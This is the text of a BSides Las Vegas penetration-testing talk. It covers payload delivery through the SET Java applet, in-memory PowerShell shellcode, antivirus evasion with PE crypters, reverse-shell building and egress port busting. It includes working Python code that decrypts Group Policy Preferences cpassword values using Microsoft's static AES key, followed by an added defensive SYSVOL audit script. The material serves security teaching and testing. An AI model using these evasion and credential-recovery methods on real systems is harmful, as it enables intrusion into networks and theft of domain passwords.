
BSIDES Las Vegas

Secret Pentesting Techniques Shhh...



Dave Kennedy
Founder, Principal Security Consultant
Email: davek@trustedsec.com
https://www.trustedsec.com
@TrustedSec
Introduction

As penetration testers, exploit writers, huggers, etc., we have secret techniques we always use.
Although some may or may not be public, they are generally obscure and not well known.

The purpose of today's talk is to show you my secrets: some of the techniques I use that aren't widely known.
Why show you? I'm an open book on everything I do, and sharing is what it's all about.
Technique #1

Java Applet Attack (SET). Well-known attack method, right?
Do you know how it actually works?
Do you know the techniques behind it that make it successful?
ZOMG APT

News agencies around the world discovered a new and extremely advanced zero-day exploit against Java.
Made me feel kind of special =)
How did people find out it was SET?
DEMO: Walking through the Attack
Explaining the Applet

Parameters that are injected into the HTML code are pulled from the Applet.
Obfuscated and randomized each time.
Parameters tell the Applet which attacks to use.
Method 1 - Binary Dropper

Binary is downloaded from the attacker machine via web server (Java downloader).
Obfuscated binary each time per deployment: a combination of PE manipulation, UPX, and rewriting the binary on the fly (import pefile).

DEMO: Binary Dropping Technique
Method 1 - Weak Sauce

Binaries are easily picked up by AV if signatures focus on obfuscation techniques (SET changes them each version).
Direct interaction with the Windows file system and writing to disk.
Multiple points of evidence on the victim machine.
Method 2 - Shellcodeexec

The Shellcodeexec method drops a custom compiled and modified version of shellcodeexec by Bernardo Damele.
The executable takes the alphanumeric shellcode as a command-line argument (int main(int argc, char *argv[])) and uses VirtualAlloc to obtain read, write, and execute memory space.
The alphanumeric shellcode is executed in memory and the payload is delivered.

DEMO: ShellcodeExec
Method 2 - Easily Detectable

Shellcodeexec is a simple yet awesome method but still has a number of drawbacks.
Like Method 1, the binaries can be picked up unless a custom version is created. Direct interaction with the Windows file system and writing to disk.
Like Method 1, multiple points of evidence on the victim machine.
Method 3 - PowerShell Injection

Detect if PowerShell is installed (installed by default on Vista and Windows 7 and 8).
PowerShell gives us complete flexibility in a number of post-exploitation situations.
Technique discovered by Matthew Graeber (you rock).
Method 3 - PS Shellcode Injection

The Applet detects if PowerShell is installed on the system.
Grabs the operating system type (x86 / x64).
Deploys shellcode straight through PowerShell.

DEMO: ShellcodeExec
Method 3 - PowerShell Injection

Never touches disk, so AV / HIPS signatures go out the door.
Obfuscated each time so that memory inspection is extremely difficult.
Extremely reliable and stable.
PE Security Evasion
Scenario 1 - Dropping PE's like it's hot

You're using Metasploit. All of them are being picked up by AV, HIPS, etc.
In most cases, I will rewrite the exe template for Metasploit to customize the binary for evasion.
Couple of cool ways to do this.
Modifying PE for Evasion in MSF

Easiest way for me is to make a simple program that creates a RWX process, then have the program execute Metasploit shellcode.

You can also modify the Metasploit exe.rb template and obfuscate the code that way.
PE Crypters

One of my favorites was recently released, called Hyperion (Christian Ammann from nullsecurity.net).
Encrypts the PE file using a randomized simple cipher key with AES-128.
When the executable is run, it brute forces the AES key, then decrypts the PE file for you.

DEMO: Hyperion
Hyperion Encryption

Very cool concept, easy to use, and easy to write one for yourself.
Ability to have a completely unique PE file each time.
Slight downfall: the stub used for the brute force is not polymorphic.
Building a Simple Reverse Shell
The Reverse Shell

Connects out to the attacker (reverse shell).
Compiling Binaries

PyInstaller compiles Python code for you into a binary by wrapping the Python interpreter into the executable.
Works on Linux, OSX, and Windows.

python Configure.py
python Makespec.py --onefile --noconsole shell.py
python Build.py shell/shell.spec
cd shell\dist

Making it easy - pybuild.py
All code and samples will be released on the TrustedSec
website soon.

DEMO: Building a Shell
Bypassing AV
Finding your way home
Bumping the Firewall

A number of companies restrict ports outbound and only allow what's needed for the business.
Trouble getting payloads out, especially if you only have one shot.
Egress Busting

Few ways to do it: a pre-staged payload for identifying a way out.
Attempt a staged reverse on every port.
Metasploit has an ALLPORTS payload as well.
Egress Buster 0.2

Server/client situation where the victim connects out on every port, 1024 ports at a time.
The server listens for the connection and reports back.
Here's where you can have some fun.
Egress Buster Reverse Shell
Egress Buster Reverse Shell

Released this week!
Allows you to bust all ports inside the firewall and spawn a command shell.
Custom, so no AV picks this up.
Byte compiled into an executable.

DEMO: Egress Buster Reverse Shell
Egress Buster Reverse Shell Usage

Recent penetration test: found a file upload + execute binaries.
Could not find a standard port out, i.e. 80, 443, 53, 25, etc.
Wrote this to deploy and found several obscure ports that were allowed.
Fun with Group Policy
One of my PERSONAL Favorites

How many times have we been on a pentest with just a domain user?
Need that local administrator account for all of the domain computers?
Research from: Sogeti ESEC Pentest

Article: http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
The Attack

Navigate to a domain controller and hit up the SYSVOL share.
Head to the domain name and the Policies folder.
Look for a GUID, then MACHINE\Preferences\Group.
Look for the Groups.xml file.

Contents of File

Static key for AES, anyone?
Python Code

# code was developed and created from
# http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
# (updated here to Python 3 syntax and the PyCryptodome AES interface)

from Crypto.Cipher import AES
from base64 import b64decode

# Static 32-byte AES-256 key that Microsoft published in the MS-GPPREF specification
key = bytes.fromhex("""
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
""".replace(" ", "").replace("\n", ""))

# cpassword attribute copied out of Groups.xml (base64; values found in real files
# often omit the trailing "=" padding and need it re-added before decoding)
cpassword = b64decode("j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw=")

# AES-CBC with an all-zero IV: the original pycrypto call AES.new(key, 2) relied on
# MODE_CBC (== 2) and its implicit zero IV, which PyCryptodome requires you to state
o = AES.new(key, AES.MODE_CBC, iv=b"\x00" * 16).decrypt(cpassword)

# Strip the PKCS#7 padding (last byte == pad length) and decode the UTF-16LE plaintext
print(o[:-o[-1]].decode("utf-16-le"))
Decrypted Password

>>> print o[:-ord(o[-1])].decode('utf16')
Local*P4ssword!
Expanding on Group.xml
More Passwords Stored

The folks over at rewt dance (http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html) found a few more areas that store passwords using the cpassword attribute.
Services, ScheduledTasks, SQL servers and much more are impacted.

List of Other Affected Areas (from rewt dance)
Services\Services.xml
http://msdn.microsoft.com/en-us/library/cc980070(v=prot.13)

ScheduledTasks\ScheduledTasks.xml
http://msdn.microsoft.com/en-us/library/cc422920(v=prot.13)
http://msdn.microsoft.com/en-us/library/dd341350(v=prot.13)
http://msdn.microsoft.com/en-us/library/dd304114(v=prot.13)

Printers\Printers.xml
http://msdn.microsoft.com/en-us/library/cc422918(v=prot.13)

Drives\Drives.xml
http://msdn.microsoft.com/en-us/library/cc704598(v=prot.13)

DataSources\DataSources.xml
http://msdn.microsoft.com/en-us/library/cc422926(v=prot.13)

There's a ton more of these.

Hopefully can make these a series.
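As an added example (not part of the original deck or of the TrustedSec tools), here is a small Python 3 audit a defender can run against a copy of SYSVOL: it checks the GPP files listed above and reports every element that still carries a cpassword attribute, so the accounts can be rotated and the preference items removed. The Groups.xml sample, its account names and GUIDs are constructed for the example; pad_cpassword handles the stripped base64 padding that real cpassword values commonly have before they are fed to the decryption code earlier in the deck.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

# GPP preference files that the deck lists as carrying cpassword attributes.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "Printers.xml", "Drives.xml", "DataSources.xml"}

# Constructed Groups.xml fragment (placeholder GUIDs); one item sets a local
# administrator password, the other only renames an account.
SAMPLE_GROUPS_XML = """<Groups clsid="{CONSTRUCTED-GROUPS-CLSID}">
  <User clsid="{CONSTRUCTED-USER-CLSID}" name="LocalAdmin" image="2"
        changed="2012-06-01 12:00:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw="
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="LocalAdmin"/>
  </User>
  <User clsid="{CONSTRUCTED-USER-CLSID}" name="Helpdesk" image="2"
        changed="2012-06-01 12:00:00" uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="U" newName="Helpdesk2" userName="Helpdesk"/>
  </User>
</Groups>"""


def pad_cpassword(value):
    """Re-add the '=' padding GPP strips from cpassword so base64 decoding works."""
    return value + "=" * (-len(value) % 4)


def find_cpasswords(xml_text, source="<memory>"):
    """Return one finding per element that carries a cpassword attribute."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        cpw = elem.get("cpassword")
        if cpw is None:
            continue
        findings.append({
            "file": source,
            "element": elem.tag,
            # Groups/Drives name the account in userName; Services and
            # ScheduledTasks use accountName or runAs. Report whichever is set.
            "account": elem.get("userName") or elem.get("accountName") or elem.get("runAs"),
            "cpassword": pad_cpassword(cpw),
        })
    return findings


def audit_sysvol(sysvol_root):
    """Walk a SYSVOL copy and collect cpassword findings from every GPP XML file."""
    findings = []
    for path in Path(sysvol_root).rglob("*.xml"):
        if path.name in GPP_FILES:
            findings.extend(find_cpasswords(path.read_bytes(), str(path)))
    return findings
```

Any finding means a password is recoverable by every domain user who can read SYSVOL; the remediation is to delete the preference item and change the account's password rather than to re-encrypt it.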
Downloads
For the code and tools used in this presentation, head
over to https://www.trustedsec.com and click on the
Downloads.

Secret Pentesting Techniques Shhh...

Dave Kennedy
Founder, Principal Security Consultant
Email: davek@trustedsec.com
https://www.trustedsec.com
TrustedSec, LLC
@TrustedSec
